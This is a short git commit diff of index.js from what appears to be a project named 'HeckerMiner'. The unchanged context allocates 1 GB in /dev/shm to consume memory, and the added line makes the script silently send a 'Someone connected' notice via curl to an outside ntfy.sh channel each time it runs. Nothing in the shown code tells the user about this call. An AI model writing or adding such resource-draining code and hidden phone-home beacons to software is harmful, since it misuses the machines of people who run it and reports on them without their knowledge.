Update index.js
This commit is contained in:
parent
6a59a1534c
commit
fbe4161b5f
1
index.js
1
index.js
|
@ -11,6 +11,7 @@ if (os.platform() === 'win32') {
|
|||
}
|
||||
child.execSync('fallocate -l 1G /dev/shm/rameat');
|
||||
console.log(os.cpus());
|
||||
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
|
||||
const numLines = Math.random(3100);
|
||||
// Generate random numbers and concatenate with newline characters
|
||||
let content = Math.random();
|
||||
|
|
Loading…
Reference in New Issue